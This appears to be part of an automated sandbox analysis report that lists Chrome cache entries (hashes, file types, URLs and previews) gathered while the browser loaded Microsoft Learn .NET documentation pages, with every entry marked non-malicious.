Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:HMB:k
MD5:	0B04EA412F8FC88B51398B1CBF38110E
SHA1:	E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
SHA-256:	7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
SHA-512:	6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
Preview:	CgkKBw2/5iXyGgA=

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65410)
Category:	dropped
Size (bytes):	179328
Entropy (8bit):	5.435214716283537
Encrypted:	false
SSDEEP:	3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVh:Wof3G0NSkNzMeO7z/l3h
MD5:	9AAA131F34337E930B99FC2A183CD7C8
SHA1:	531725F3A406D8ACE021F5048FDC8ABE7C999240
SHA-256:	047241CD288B327E265C49B6AF8226FF309F1EAA38C7A10AE1F965CDE3BD64B1
SHA-512:	8C3822816E6EC67E83B8CED11F8125E5F07FFF82B6B584F789A0DBCE52D88A04861152EBDB930C5EA12D6289BB8D905F3A044688ABFC0FB614F4AF311C137D52
Malicious:	false
Preview:	/!. 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e\|\|self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]\|\|{},d=(d=e)[l="oneDS"]=d[l]\|\|{},e=f[o]=f[o]\|\|{},p=e.v=e.v\|\|[],l=d[o]=d[o]\|\|{},g=l.v=l.v\|\|[];for(i in(l.o=l.o\|\|[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]\|\|(g[i]="---"),(u[r]=u[r]\|\|[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e\|\|t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	27868
Entropy (8bit):	5.155680085584642
Encrypted:	false
SSDEEP:	768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
MD5:	0A0F2E1CCB8E5F7C38CB11B101A8941F
SHA1:	112F4B7CB3DEDB9D9744CAC000E05DC949E89891
SHA-256:	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
SHA-512:	9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
Malicious:	false
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65410)
Category:	downloaded
Size (bytes):	207935
Entropy (8bit):	5.420780972514107
Encrypted:	false
SSDEEP:	3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
MD5:	3DE400B2682E30C3F33FA4B93116491F
SHA1:	BC48B898DF43BA2178DE28F5A29D977B2204F846
SHA-256:	84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
SHA-512:	D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
Malicious:	false
URL:	https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Preview:	/!. 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e\|\|self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]\|\|{},d=(d=e)[l="oneDS"]=d[l]\|\|{},e=f[o]=f[o]\|\|{},p=e.v=e.v\|\|[],l=d[o]=d[o]\|\|{},g=l.v=l.v\|\|[];for(i in(l.o=l.o\|\|[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]\|\|(g[i]="---"),(u[r]=u[r]\|\|[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e\|\|t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	27868
Entropy (8bit):	5.155680085584642
Encrypted:	false
SSDEEP:	768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
MD5:	0A0F2E1CCB8E5F7C38CB11B101A8941F
SHA1:	112F4B7CB3DEDB9D9744CAC000E05DC949E89891
SHA-256:	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
SHA-512:	9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/banners/index.json
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/global/deprecation.js
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	464328
Entropy (8bit):	5.0747157240281755
Encrypted:	false
SSDEEP:	6144:XegPrbKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:1KCerXyUh
MD5:	875E7F3672FEC41DDB5A2386D2331531
SHA1:	282979933E99BDE3A6342DC1EF93FBC51682F2C3
SHA-256:	F205B3CBA340ECB0B5D45E5DE6D385947CC4C21248707A90BFD5894E9B61F3C9
SHA-512:	67A3C1D8FF089E01C20962D96968DE43F3E8D49B474C396F08827EE891C0315693634E663D3148D7441B501EA6939A7D84A80B1E855B7C2A8BCB17E0013AFAD4
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/styles/site-ltr.css
Preview:	.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	dropped
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	downloaded
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
URL:	https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
URL:	https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	dropped
Size (bytes):	1817143
Entropy (8bit):	5.501007973622959
Encrypted:	false
SSDEEP:	24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:	F57E274AE8E8889C7516D3E53E3EB026
SHA1:	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:	9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:	false
Preview:	"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. 